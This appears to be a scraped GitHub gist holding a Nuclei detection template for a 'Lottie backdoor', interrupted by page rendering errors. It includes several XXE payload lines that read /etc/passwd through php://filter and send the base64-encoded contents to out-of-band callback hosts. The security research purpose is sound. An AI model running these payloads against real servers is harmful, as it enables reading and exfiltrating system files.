Skip to content

Instantly share code, notes, and snippets.

View NagliNagli's full-sized avatar

Gal Nagli NagliNagli

View GitHub Profile
id: backdoor-lottie-detection
info:
name: detect-lottie-backdoor
author: nagli-wiz-research
severity: critical
requests:
- raw:
- |+
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://<COLLAB_URL>?%data;'>">
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://5ouxuxkc.c5.rs?%data;'>">
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://5ouxuxkc.c5.rs?%data;'>">
<!ENTITY % d SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://zfp6590t.c5.rs/endpoint.php?a=%d;'>">